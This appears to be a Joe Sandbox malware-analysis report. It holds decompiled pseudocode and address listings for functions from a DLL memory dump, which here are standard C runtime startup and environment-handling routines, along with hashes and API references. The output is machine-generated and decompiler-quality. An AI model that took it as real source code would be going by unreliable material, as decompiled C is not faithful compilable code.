			E6DA59988(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x6da810d0);
				E6DA59CA0(__ebx, __edi, __esi);
				_t34 =  *0x6daa51a4; // 0x1
				if(_t34 > 0) {
					 *0x6daa51a4 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6DA59558();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6daa5180 - 2;
					if( *0x6daa5180 != 2) {
						E6DA59EC6(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6da810f8);
						E6DA59CA0(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6DA59B43( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6DA5982E(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t76 = E6DA564F0( *((intOrPtr*)(_t82 + 8)), _t72);
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E6DA564F0( *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6DA59988(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E6DA59B43( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6DA5982E(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6DA59B43( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6daa51a4 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6DA59623(__ebx, _t61, 1, __esi);
						E6DA5A090();
						E6DA5A0F1();
						 *0x6daa5180 =  *0x6daa5180 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6DA59A1D();
						_t54 = E6DA597C4( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6DA59A2A();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x6da59988
0x6da59988
0x6da5998a
0x6da5998f
0x6da59994
0x6da5999b
0x6da599a2
0x6da599aa
0x6da599ad
0x6da599b6
0x6da599b9
0x6da599bc
0x6da599c3
0x6da59a32
0x6da59a37
0x6da59a38
0x6da59a3a
0x6da59a3f
0x6da59a44
0x6da59a47
0x6da59a49
0x6da59a5a
0x6da59a5a
0x6da59a5e
0x6da59a61
0x6da59a6d
0x6da59a6d
0x6da59a7a
0x6da59a7c
0x6da59a7f
0x6da59a81
0x6da59a8c
0x6da59a91
0x6da59a93
0x6da59a96
0x6da59a98
0x00000000
0x00000000
0x6da59a98
0x6da59a63
0x6da59a63
0x6da59a66
0x00000000
0x6da59a68
0x6da59a68
0x6da59a9e
0x6da59a9e
0x6da59aa8
0x6da59aaa
0x6da59aad
0x6da59ab0
0x6da59ab2
0x6da59ab4
0x6da59ab6
0x6da59abb
0x6da59ac0
0x6da59ac2
0x6da59ac2
0x6da59ac8
0x6da59ac9
0x6da59ace
0x6da59ad4
0x6da59ad4
0x6da59ab4
0x6da59ad9
0x6da59adb
0x6da59ae2
0x6da59aec
0x6da59aee
0x6da59af1
0x6da59af3
0x6da59aff
0x6da59b27
0x6da59b27
0x6da59add
0x6da59add
0x6da59ae0
0x00000000
0x00000000
0x6da59ae0
0x6da59adb
0x6da59a66
0x6da59b2a
0x6da59b31
0x6da59a4b
0x6da59a4b
0x6da59a51
0x00000000
0x6da59a53
0x6da59a53
0x6da59a53
0x6da59a51
0x6da59b36
0x6da59b42
0x6da599c5
0x6da599c5
0x6da599ca
0x6da599cf
0x6da599d4
0x6da599db
0x6da599df
0x6da599e9
0x6da599f5
0x6da599f7
0x6da599f7
0x6da599f9
0x6da599fc
0x6da59a03
0x6da59a08
0x00000000
0x6da59a08
0x6da5999d
0x6da5999d
0x6da59a0a
0x6da59a0d
0x6da59a19
0x6da59a19

APIs

__RTC_Initialize.LIBCMT ref: 6DA599CF
___scrt_uninitialize_crt.LIBCMT ref: 6DA599E9

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: f4175a675044a36d80d3848ee5abe35ffd74503b2ddd2af6c5536c507f90f650
Instruction ID: 745b5eb8e585941f61d121a57d1f01ddc344407f9d3b253980ac2d574b8be39e
Opcode Fuzzy Hash: f4175a675044a36d80d3848ee5abe35ffd74503b2ddd2af6c5536c507f90f650
Instruction Fuzzy Hash: 5941D6F2E0C216AFEF118F54CB00BBE76B5EB85B54F064515FA156F280D7318DA29BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA59A38 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E6DA59A38(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x6da810f8);
				E6DA59CA0(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6DA59B43( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6DA5982E(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_t45 = E6DA564F0( *((intOrPtr*)(_t47 + 8)), _t42);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_t29 = E6DA564F0( *((intOrPtr*)(_t47 + 8)), _t26);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6DA59988(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E6DA59B43( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6DA5982E(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6DA59B43( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6daa51a4 - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x6da59a38
0x6da59a38
0x6da59a3a
0x6da59a3f
0x6da59a44
0x6da59a49
0x6da59a5a
0x6da59a5a
0x6da59a5e
0x6da59a61
0x6da59a6d
0x6da59a6d
0x6da59a7a
0x6da59a7c
0x6da59a7f
0x6da59a81
0x6da59b2a
0x6da59b2a
0x6da59b31
0x6da59b33
0x6da59b36
0x6da59b42
0x6da59b42
0x6da59a8c
0x6da59a91
0x6da59a93
0x6da59a96
0x6da59a98
0x00000000
0x00000000
0x6da59a9e
0x6da59a9e
0x6da59aa8
0x6da59aaa
0x6da59aad
0x6da59ab0
0x6da59ab2
0x6da59ab4
0x6da59ab6
0x6da59abb
0x6da59ac0
0x6da59ac2
0x6da59ac2
0x6da59ac8
0x6da59ac9
0x6da59ace
0x6da59ad4
0x6da59ad4
0x6da59ab4
0x6da59ad9
0x6da59adb
0x6da59ae2
0x6da59aec
0x6da59aee
0x6da59af1
0x6da59af3
0x6da59aff
0x6da59b27
0x6da59b27
0x00000000
0x6da59add
0x6da59add
0x6da59ae0
0x00000000
0x00000000
0x00000000
0x6da59ae0
0x6da59adb
0x6da59a63
0x6da59a66
0x00000000
0x00000000
0x6da59a68
0x00000000
0x6da59a68
0x6da59a4b
0x6da59a51
0x00000000
0x00000000
0x6da59a53
0x00000000

APIs

dllmain_raw.LIBCMT ref: 6DA59A75
dllmain_crt_dispatch.LIBCMT ref: 6DA59A8C
dllmain_raw.LIBCMT ref: 6DA59AD4
dllmain_crt_dispatch.LIBCMT ref: 6DA59AE7
dllmain_raw.LIBCMT ref: 6DA59AFA

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: f98ed644d68df3c4e73639532e4c574895be01ddb9029f1d36521cb0538aa011
Instruction ID: 3e53382566e1e01fb4d10038d5aae3d4ce2f63388e6bf6d32e6606c8aec3005c
Opcode Fuzzy Hash: f98ed644d68df3c4e73639532e4c574895be01ddb9029f1d36521cb0538aa011
Instruction Fuzzy Hash: 5921A0F5D0C21AAEEF218E14CB40E7F3A79EB85A94F0A4515F9145F250D3318EA28BE0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6A221 Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 19%

			E6DA6A221() {
				intOrPtr _v8;
				signed int _v12;
				WCHAR* _t5;
				void* _t6;
				intOrPtr _t9;
				WCHAR* _t10;
				WCHAR* _t19;
				WCHAR* _t26;
				WCHAR* _t29;

				_push(_t21);
				_t5 = GetEnvironmentStringsW();
				_t29 = _t5;
				if(_t29 != 0) {
					_t6 = E6DA6A1EA(_t29);
					_t19 = 0;
					_v12 = _t6 - _t29 >> 1;
					_t9 = E6DA68F81(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
					_v8 = _t9;
					if(_t9 != 0) {
						_t10 = E6DA6458B(_t9); // executed
						_t26 = _t10;
						_push(0);
						if(_t26 != 0) {
							_push(0);
							_push(_v8);
							_push(_t26);
							_push(_v12);
							_push(_t29);
							_push(0);
							_push(0);
							if(E6DA68F81() != 0) {
								E6DA64760(0);
								_t19 = _t26;
							} else {
								E6DA64760(_t26);
							}
							FreeEnvironmentStringsW(_t29);
							_t5 = _t19;
						} else {
							E6DA64760();
							FreeEnvironmentStringsW(_t29);
							_t5 = 0;
						}
					} else {
						FreeEnvironmentStringsW(_t29);
						_t5 = 0;
					}
				}
				return _t5;
			}

0x6da6a227
0x6da6a229
0x6da6a22f
0x6da6a233
0x6da6a23b
0x6da6a240
0x6da6a24e
0x6da6a251
0x6da6a259
0x6da6a25e
0x6da6a26d
0x6da6a272
0x6da6a275
0x6da6a278
0x6da6a28b
0x6da6a28c
0x6da6a28f
0x6da6a290
0x6da6a293
0x6da6a294
0x6da6a295
0x6da6a2a0
0x6da6a2ab
0x6da6a2b0
0x6da6a2a2
0x6da6a2a3
0x6da6a2a3
0x6da6a2b4
0x6da6a2ba
0x6da6a27a
0x6da6a27a
0x6da6a281
0x6da6a287
0x6da6a287
0x6da6a260
0x6da6a261
0x6da6a267
0x6da6a267
0x6da6a2bd
0x6da6a2c0

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6DA6A229

Part of subcall function 6DA68F81: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6DA67659,?,00000000,-00000008), ref: 6DA6902D

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6DA6A261
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6DA6A281

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 96b250a8a5be850bbe12cf56ed2c3b992e288c3ed9f043edb021e5712823baaf
Instruction ID: 518c9da0d2a5108f95788811bde04cb4bacfcd74149e80bd242ed786870b7171
Opcode Fuzzy Hash: 96b250a8a5be850bbe12cf56ed2c3b992e288c3ed9f043edb021e5712823baaf
Instruction Fuzzy Hash: 5311A5F699D6A5FFA7012A755D88CAF2AAEED8B29C7050014F901D1140FB61CD8141B1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA59881 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E6DA59881(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;

				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E6DA59CA0(__ebx, __edi, __esi);
				_t43 = E6DA59653(__ecx, __edx, 0); // executed
				_t90 = 0x6da810b0;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E6DA59558();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x6daa5180;
					if( *0x6daa5180 != 0) {
						E6DA59EC6(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x6da810d0);
						E6DA59CA0(1, __edi, __esi);
						_t48 =  *0x6daa51a4; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6daa51a4 = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E6DA59558();
							 *(_t123 - 4) = 1;
							__eflags =  *0x6daa5180 - 2;
							if( *0x6daa5180 != 2) {
								E6DA59EC6(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x6da810f8);
								E6DA59CA0(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E6DA59B43( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E6DA5982E(_t90,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_push(_t86);
											_t115 = E6DA564F0( *((intOrPtr*)(_t123 + 8)), _t110);
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_push(_t86);
													_t59 = E6DA564F0( *((intOrPtr*)(_t123 + 8)), _t56);
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E6DA59B43( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E6DA5982E(_t90,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E6DA59B43( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x6daa51a4 - _t110; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E6DA59623(1, _t90, 1, _t113);
								E6DA5A090();
								E6DA5A0F1();
								 *0x6daa5180 =  *0x6daa5180 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E6DA59A1D();
								_t67 = E6DA597C4( *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E6DA59A2A();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x6daa5180 = 1;
						if(E6DA595B5(_t132) != 0) {
							E6DA5A084(E6DA5A0C5());
							E6DA5A0A2();
							_t80 = E6DA620E2(0x6da741dc, 0x6da741f0);
							_pop(_t102);
							if(_t80 == 0 && E6DA5958A(1, _t102) != 0) {
								E6DA620B7(0x6da74160, 0x6da741d8);
								 *0x6daa5180 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E6DA59964();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E6DA5A0BF();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E6DA59713(_t85, _t106, _t121, _t138) != 0) {
									 *0x6da7415c( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x6daa51a4 =  *0x6daa51a4 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}

0x6da59881
0x6da59881
0x6da59881
0x6da59881
0x6da59888
0x6da5988f
0x6da59894
0x6da59897
0x6da5996e
0x6da5996e
0x6da5996e
0x00000000
0x6da5989d
0x6da598a2
0x6da598a5
0x6da598a7
0x6da598aa
0x6da598ae
0x6da598b5
0x6da59982
0x6da59987
0x6da59988
0x6da5998a
0x6da5998f
0x6da59994
0x6da59999
0x6da5999b
0x6da599a2
0x6da599aa
0x6da599ad
0x6da599b6
0x6da599b9
0x6da599bc
0x6da599c3
0x6da59a32
0x6da59a37
0x6da59a38
0x6da59a3a
0x6da59a3f
0x6da59a44
0x6da59a47
0x6da59a49
0x6da59a5a
0x6da59a5a
0x6da59a5e
0x6da59a61
0x6da59a6d
0x6da59a6d
0x6da59a7a
0x6da59a7c
0x6da59a7f
0x6da59a81
0x6da59a8c
0x6da59a91
0x6da59a93
0x6da59a96
0x6da59a98
0x00000000
0x00000000
0x6da59a98
0x6da59a63
0x6da59a63
0x6da59a66
0x00000000
0x6da59a68
0x6da59a68
0x6da59a9e
0x6da59a9e
0x6da59aa8
0x6da59aaa
0x6da59aad
0x6da59ab0
0x6da59ab2
0x6da59ab4
0x6da59ab6
0x6da59abb
0x6da59ac0
0x6da59ac2
0x6da59ac2
0x6da59ac8
0x6da59ac9
0x6da59ace
0x6da59ad4
0x6da59ad4
0x6da59ab4
0x6da59ad9
0x6da59adb
0x6da59ae2
0x6da59aec
0x6da59aee
0x6da59af1
0x6da59af3
0x6da59aff
0x6da59b27
0x6da59b27
0x6da59add
0x6da59add
0x6da59ae0
0x00000000
0x00000000
0x6da59ae0
0x6da59adb
0x6da59a66
0x6da59b2a
0x6da59b31
0x6da59a4b
0x6da59a4b
0x6da59a51
0x00000000
0x6da59a53
0x6da59a53
0x6da59a53
0x6da59a51
0x6da59b36
0x6da59b42
0x6da599c5
0x6da599c5
0x6da599ca
0x6da599cf
0x6da599d4
0x6da599db
0x6da599df
0x6da599e9
0x6da599f5
0x6da599f7
0x6da599f7
0x6da599f9
0x6da599fc
0x6da59a03
0x6da59a08
0x00000000
0x6da59a08
0x6da5999d
0x6da5999d
0x6da59a0a
0x6da59a0d
0x6da59a19
0x6da59a19
0x6da598bb
0x6da598bb
0x6da598cc
0x6da598d3
0x6da598d8
0x6da598e7
0x6da598ed
0x6da598f0
0x6da59905
0x6da5990c
0x6da59916
0x6da59918
0x6da59918
0x6da598f0
0x6da5991b
0x6da59922
0x6da59929
0x00000000
0x6da5992b
0x6da59930
0x6da59932
0x6da59935
0x6da59937
0x6da59940
0x6da5994e
0x6da59954
0x6da59954
0x6da59940
0x6da59956
0x6da5995e
0x6da5995e
0x6da59970
0x6da59973
0x6da5997f
0x6da5997f
0x6da598b5

APIs

__RTC_Initialize.LIBCMT ref: 6DA598CE

Part of subcall function 6DA5A084: RtlInitializeSListHead.NTDLL(6DAA51B8), ref: 6DA5A089

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6DA59938

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 86dfcb143308e0526a787753536ae6c40bded91cfa94254f246a78a238c8d280
Instruction ID: d6be3f7ea0bac6fe94b8111f5ea0828003e809fd132b632b9eaa9459b71f7f30
Opcode Fuzzy Hash: 86dfcb143308e0526a787753536ae6c40bded91cfa94254f246a78a238c8d280
Instruction Fuzzy Hash: 242123B664C346EEDB206BB497007BC3362AF17368F154119C6612F1D2CB7291F4C666

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6580C Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E6DA6580C() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x6daa5858 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							L16:
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x6daa5844; // 0x6da5d8
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
							goto L18;
						} else {
							_t25 = GetFileType(_t28); // executed
							if(_t25 == 0) {
								goto L16;
							} else {
								_t20 = _t25 & 0x000000ff;
								 *(_t33 + 0x18) = _t28;
								if(_t20 != 2) {
									if(_t20 == 3) {
										 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
									}
								} else {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
								}
								goto L18;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					L18:
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}

0x6da65811
0x6da65813
0x6da65817
0x6da65820
0x6da6582b
0x6da6583b
0x6da6583f
0x6da65842
0x6da65854
0x6da65844
0x6da65847
0x6da65850
0x6da65849
0x6da6584c
0x6da6584c
0x6da65847
0x6da65856
0x6da6585e
0x6da65863
0x6da65890
0x6da65890
0x6da65894
0x6da6589b
0x6da658a2
0x6da658a4
0x6da658a7
0x6da658a7
0x00000000
0x6da65869
0x6da6586a
0x6da65872
0x00000000
0x6da65874
0x6da65874
0x6da65877
0x6da6587d
0x6da65888
0x6da6588a
0x6da6588a
0x6da6587f
0x6da6587f
0x6da6587f
0x00000000
0x6da6587d
0x6da65872
0x6da65833
0x6da65833
0x6da65833
